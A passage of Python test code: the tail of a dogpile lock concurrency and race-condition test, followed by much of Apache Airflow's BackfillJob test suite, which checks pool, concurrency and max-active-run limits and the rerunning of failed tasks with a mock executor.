# should never hit a cache invalidation
# if we've set expiretime below the cache
# expire time (assuming a cache which
# honors this).
self._assert_log(
cache_expire_time < expiretime,
"Cache expiration hit, cache "
"expire time %s, expiretime %s",
cache_expire_time,
expiretime,
)
raise NeedRegenerationException()
if slow_write_time:
readwritelock.acquire_read_lock()
try:
return the_resource[-1], the_resource[-1]
finally:
if slow_write_time:
readwritelock.release_read_lock()
def use_dogpile():
try:
for i in range(num_usages):
now = time.time()
with Lock(
mutex, create_resource,
get_value, expiretime) as value:
waited = time.time() - now
if waited > .01:
slow_waiters[0] += 1
check_value(value, waited)
time.sleep(usage_time)
time.sleep(delay_time)
except:
log.error("thread failed", exc_info=True)
failures[0] += 1
def check_value(value, waited):
assert value
# time since the current resource was
# created
time_since_create = time.time() - value
self._assert_log(
time_since_create < max_stale,
"Time since create %.4f max stale time %s, "
"total waited %s",
time_since_create, max_stale,
slow_waiters[0]
)
started_at = time.time()
threads = []
for i in range(num_threads):
t = threading.Thread(target=use_dogpile)
t.start()
threads.append(t)
for t in threads:
t.join()
actual_run_time = time.time() - started_at
# time spent starts with num usages * time per usage, with a 10% fudge
expected_run_time = (num_usages * (usage_time + delay_time)) * 1.1
expected_generations = math.ceil(
expected_run_time / effective_expiretime)
if unsafe_cache:
expected_slow_waiters = expected_generations * num_threads
else:
expected_slow_waiters = expected_generations + num_threads - 1
if slow_write_time:
expected_slow_waiters = num_threads * expected_generations
# time spent also increments by one wait period in the beginning...
expected_run_time += effective_creation_time
# and a fudged version of the periodic waiting time anticipated
# for a single thread...
expected_run_time += (
expected_slow_waiters * effective_creation_time) / num_threads
expected_run_time *= 1.1
log.info("Test Summary")
log.info(
"num threads: %s; expiretime: %s; creation_time: %s; "
"num_usages: %s; "
"usage_time: %s; delay_time: %s",
num_threads, expiretime, creation_time, num_usages,
usage_time, delay_time
)
log.info(
"cache expire time: %s; unsafe cache: %s",
cache_expire_time, unsafe_cache)
log.info(
"Estimated run time %.2f actual run time %.2f",
expected_run_time, actual_run_time)
log.info(
"Effective expiretime (min(cache_exp_time, exptime)) %s",
effective_expiretime)
log.info(
"Expected slow waits %s, Total slow waits %s",
expected_slow_waiters, slow_waiters[0])
log.info(
"Total generations %s Max generations expected %s" % (
len(the_resource), expected_generations
)
)
assert not failures[0], "%s failures occurred" % failures[0]
assert actual_run_time <= expected_run_time
assert slow_waiters[0] <= expected_slow_waiters, \
"Number of slow waiters %s exceeds expected slow waiters %s" % (
slow_waiters[0],
expected_slow_waiters
)
assert len(the_resource) <= expected_generations,\
"Number of resource generations %d exceeded "\
"expected %d" % (
len(the_resource),
expected_generations)
class RaceConditionTests(TestCase):
def test_no_double_get_on_expired(self):
mutex = threading.Lock()
the_value = "the value"
expiration_time = 10
created_time = 10
current_time = 22 # e.g. it's expired
def creator():
return the_value, current_time
def value_and_created_fn():
return the_value, created_time
value_and_created_fn = mock.Mock(side_effect=value_and_created_fn)
def time_mock():
return current_time
with mock.patch("dogpile.lock.time.time", time_mock):
with Lock(
mutex, creator, value_and_created_fn, expiration_time
) as entered_value:
self.assertEquals("the value", entered_value)
self.assertEquals(
value_and_created_fn.call_count, 1
)
|
test_backfill_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import json
import logging
import threading
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.cli import cli_parser
from airflow.exceptions import (
AirflowException,
AirflowTaskTimeout,
BackfillUnfinished,
DagConcurrencyLimitReached,
NoAvailablePoolSlot,
TaskConcurrencyLimitReached,
)
from airflow.jobs.backfill_job import BackfillJob
from airflow.models import DagBag, Pool, TaskInstance as TI
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstanceKey
from airflow.operators.dummy import DummyOperator
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.db import (
clear_db_dags,
clear_db_pools,
clear_db_runs,
clear_db_xcom,
set_default_pool_slots,
)
from tests.test_utils.mock_executor import MockExecutor
from tests.test_utils.timetables import cron_timetable
logger = logging.getLogger(__name__)
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
@pytest.fixture(scope="module")
def dag_bag():
return DagBag(include_examples=True)
class TestBackfillJob:
@staticmethod
def clean_db():
clear_db_dags()
clear_db_runs()
clear_db_xcom()
clear_db_pools()
@pytest.fixture(autouse=True)
def set_instance_attrs(self, dag_bag):
self.clean_db()
self.parser = cli_parser.get_parser()
self.dagbag = dag_bag
def _get_dummy_dag(
self,
dag_maker_fixture,
dag_id='test_dag',
pool=Pool.DEFAULT_POOL_NAME,
max_active_tis_per_dag=None,
task_id='op',
**kwargs,
):
with dag_maker_fixture(dag_id=dag_id, schedule_interval='@daily', **kwargs) as dag:
DummyOperator(task_id=task_id, pool=pool, max_active_tis_per_dag=max_active_tis_per_dag)
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
def test_unfinished_dag_runs_set_to_failed(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.FAILED == dag_run.state
def test_dag_run_with_finished_tasks_set_to_success(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun()
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.SUCCESS == dag_run.state
@pytest.mark.xfail(condition=True, reason="This test is flaky")
@pytest.mark.backend("postgres", "mysql")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
# dag_file_processor = DagFileProcessor(dag_ids=[], log=Mock())
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert not task_instances_list
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_first_depends_on_past=True
)
job.run()
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert task_instances_list
@pytest.mark.backend("postgres", "mysql")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('miscellaneous_test_dag')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
assert [
((dag.dag_id, task_id, f'backfill__{when.isoformat()}', 1, -1), (State.SUCCESS, None))
for (task_id, when) in expected_execution_order
] == executor.sorted_tasks
session = settings.Session()
drs = session.query(DagRun).filter(DagRun.dag_id == dag.dag_id).order_by(DagRun.execution_date).all()
assert drs[0].execution_date == DEFAULT_DATE
assert drs[0].state == State.SUCCESS
assert drs[1].execution_date == DEFAULT_DATE + datetime.timedelta(days=1)
assert drs[1].state == State.SUCCESS
dag.clear()
session.close()
@pytest.mark.backend("postgres", "mysql")
@pytest.mark.parametrize(
"dag_id, expected_execution_order",
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"miscellaneous_test_dag",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
],
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
assert [
((dag_id, task_id, f'backfill__{DEFAULT_DATE.isoformat()}', 1, -1), (State.SUCCESS, None))
for task_id in expected_execution_order
] == executor.sorted_tasks
def test_backfill_conf(self, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_conf')
dag_maker.create_dagrun()
executor = MockExecutor()
conf_ = json.loads("""{"key": "value"}""")
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf_,
)
job.run()
# We ignore the first dag_run created by fixture
dr = DagRun.find(
dag_id='test_backfill_conf', execution_start_date=DEFAULT_DATE + datetime.timedelta(days=1)
)
assert conf_ == dr[0].conf
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_max_active_tis_per_dag_limit(self, mock_log, dag_maker):
max_active_tis_per_dag = 2
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_max_active_tis_per_dag_limit',
max_active_tis_per_dag=max_active_tis_per_dag,
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
task_concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= max_active_tis_per_dag
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == max_active_tis_per_dag:
task_concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert task_concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_task_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_dag_concurrency_limit(self, mock_log, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_respect_concurrency_limit')
dag_maker.create_dagrun()
dag.max_active_tasks = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= dag.max_active_tasks
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.max_active_tasks:
concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_dag_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_default_pool_limit(self, mock_log, dag_maker):
default_pool_slots = 2
set_default_pool_slots(default_pool_slots)
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_with_no_pool_limit')
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
default_pool_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# default_pool slots at any point of time.
for running_task_instances in executor.history:
assert len(running_task_instances) <= default_pool_slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == default_pool_slots:
default_pool_task_slot_count_reached_at_least_once = True
assert 8 == num_running_task_instances
assert default_pool_task_slot_count_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_pool_not_found(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_pool_limit(self, mock_log, dag_maker):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
assert 8 == num_running_task_instances
assert pool_was_full_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_task_concurrency_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_run_rescheduled(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_run_rescheduled", task_id="test_backfill_run_rescheduled_task-1"
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_rerun_failed", task_id="test_backfill_rerun_failed_task-1"
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_upstream_failed_tasks(self, dag_maker):
with dag_maker(dag_id='test_backfill_rerun_upstream_failed', schedule_interval='@daily') as dag:
op1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1')
op2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2')
op1.set_upstream(op2)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks_without_flag(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id='test_backfill_rerun_failed', task_id='test_backfill_rerun_failed_task-1'
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False,
)
with pytest.raises(AirflowException):
job.run()
def test_backfill_retry_intermittent_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_intermittent_failure_job',
schedule_interval="@daily",
default_args={
'retries': 2,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dag_maker.create_dagrun()
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=2)
] = State.UP_FOR_RETRY
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
def test_backfill_retry_always_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_always_failure_job',
schedule_interval="@daily",
default_args={
'retries': 1,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dr = dag_maker.create_dagrun()
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, dr.run_id, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_fail(dag.dag_id, task1.task_id, dr.run_id, try_number=2)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
)
with pytest.raises(BackfillUnfinished):
job.run()
def test_backfill_ordered_concurrent_execute(self, dag_maker):
with dag_maker(
dag_id='test_backfill_ordered_concurrent_execute',
schedule_interval="@daily",
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
runid0 = f'backfill__{DEFAULT_DATE.isoformat()}'
dag_maker.create_dagrun(run_id=runid0)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
runid1 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()}'
runid2 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=2)).isoformat()}'
# test executor history keeps a list
history = executor.history
assert [sorted(item[-1].key[1:3] for item in batch) for batch in history] == [
[
('leave1', runid0),
('leave1', runid1),
('leave1', runid2),
('leave2', runid0),
('leave2', runid1),
('leave2', runid2),
],
[('upstream_level_1', runid0), ('upstream_level_1', runid1), ('upstream_level_1', runid2)],
[('upstream_level_2', runid0), ('upstream_level_2', runid1), ('upstream_level_2', runid2)],
[('upstream_level_3', runid0), ('upstream_level_3', runid1), ('upstream_level_3', runid2)],
]
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
session.close()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
executor = MockExecutor(do_update=True)
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
# run with timeout because this creates an infinite loop if not
# caught
try:
with timeout(seconds=5):
job.run()
except AirflowTaskTimeout:
pass
ti = TI(task=dag.get_task('test_backfill_pooled_task'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
@pytest.mark.parametrize("ignore_depends_on_past", [True, False])
def test_backfill_depends_on_past_works_independently_on_ignore_depends_on_past(
self, ignore_depends_on_past
):
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=MockExecutor(),
ignore_first_depends_on_past=ignore_depends_on_past,
).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, ignore_first_depends_on_past=True, **kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
assert ti.state == State.SUCCESS
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: test_dop_task'
with pytest.raises(AirflowException, match=expected_msg):
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, run_backwards=True, **kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'dags',
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay-on-limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
assert 0.5 == parsed_args.delay_on_limit
def _get_dag_test_max_active_limits(
self, dag_maker_fixture, dag_id='test_dag', max_active_runs=1, **kwargs
):
with dag_maker_fixture(
dag_id=dag_id,
schedule_interval="@hourly",
max_active_runs=max_active_runs,
**kwargs,
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
return dag
def test_backfill_max_limit_check_within_limit(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_within_limit', max_active_runs=16
)
dag_maker.create_dagrun()
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
assert 2 == len(dagruns)
assert all(run.state == State.SUCCESS for run in dagruns)
def test_backfill_max_limit_check(self, dag_maker):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dag_run'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
# this session object is different than the one in the main thread
with create_session() as thread_session:
try:
dag = self._get_dag_test_max_active_limits(
dag_maker,
dag_id=dag_id,
)
dag_maker.create_dagrun(
# Existing dagrun that is not within the backfill range
run_id=run_id,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
)
thread_session.commit()
cond.notify()
finally:
cond.release()
thread_session.close()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
backfill_job_thread = threading.Thread(
target=run_backfill, name="run_backfill", args=(dag_run_created_cond,)
)
dag_run_created_cond.acquire()
with create_session() as session:
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
assert 1 == len(dagruns)
dr = dagruns[0]
assert dr.run_id == run_id
# allow the backfill to execute
# by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
assert 3 == len(dagruns) # 2 from backfill + 1 existing
assert dagruns[-1].run_id == dr.run_id
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self, dag_maker):
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_no_count_existing'
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
assert 1 == len(dagruns)
assert State.SUCCESS == dagruns[0].state
def test_backfill_max_limit_check_complete_loop(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_complete_loop'
)
dag_maker.create_dagrun()
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
assert success_expected == success_dagruns
assert 0 == running_dagruns # no dag_runs in running state are left
def test_sub_set_subdag(self, dag_maker):
with dag_maker(
'test_sub_set_subdag',
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dr = dag_maker.create_dagrun()
executor = MockExecutor()
sub_dag = dag.partial_subset(
task_ids_or_regex="leave*", include_downstream=False, include_upstream=False
)
job = BackfillJob(dag=sub_dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
job.run()
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
assert State.SUCCESS == ti.state
else:
assert State.NONE == ti.state
def test_backfill_fill_blanks(self, dag_maker):
with dag_maker(
